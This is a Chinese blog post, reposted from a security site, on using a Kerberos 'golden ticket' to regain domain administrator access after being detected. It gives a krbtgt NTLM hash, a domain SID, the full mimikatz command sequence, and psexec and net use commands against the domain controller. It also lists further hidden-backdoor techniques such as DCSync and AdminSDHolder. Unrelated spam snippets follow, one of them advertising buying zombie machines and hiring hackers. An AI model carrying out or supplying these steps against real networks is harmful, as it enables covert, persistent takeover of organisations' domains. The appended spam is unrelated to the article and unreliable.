最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。
我原来发过一个微博说
这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:
要重新拿回域管理员权限,首先要先知道域内的管理员有谁
我这里的实验环境,通过截图可以看到域管理员是administrator
我还要知道域SID是啥
我的域SID是
还有最重要的krbtgt用户的ntlm哈希,我原来导出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::
然后该用神器mimikatz出场了,依次执行
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
到现在,我们又重新拥有域管理员权限了,可以验证下
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。
当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。
【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】
针对微软公司密秘产品研发自身的下一代Edge电脑浏览器,大家早就有一定的了解,也一直很好奇,那样一个根据Chromium全新核心的电脑浏览器有啥特点。虽然微软公司为对外开放公布一切的公布检测,還是有海...
楚楚baby是什么梗 (为什么说“楚楚baby下落不明) 最近这段时间,小编在网上看到很多关于非常好看的小姐姐,但是在看评论的时候,很多都是说什么“楚楚baby下落不明”的留言,这是什么意思呢?...
一、怎么买肉鸡怎么找黑客 1、免费刷q币黑客网站成为一个黑客需要精神上的奉献和艰苦的工作。怎么买肉鸡软件实验的结果是如此之好,以至于Jober成为了世界上最聪明的人。网站黑客如果你想被视为黑客,你的行...
本文目录一览: 1、互联网上的任何东西都可以爬取吗? 2、淘宝12亿条客户信息遭爬取,黑客非法获利34万,客户信息是如何泄露的? 3、黑客会泄露别人隐私吗? 互联网上的任何东西都可以爬取吗?...
在线接单平台QQ2018年以来,苹果专门针对中国手机市场推出了双卡双待机的iPhone手机,以显示对中国市场的关注,这也反映了中国消费者对双卡双待机功能的关注。双卡和双待机功能似乎是必不可少的,这也关...
公牛转换插座好不好?说到公牛这个品牌,很多人都会竖起大拇指,因为它可是开关领域的佼佼者,是质量的保证者,所以很多人在买插座的时候会选择公牛插座,但是它质量到底好不好,还是要具体看的,另外还要知道公牛转...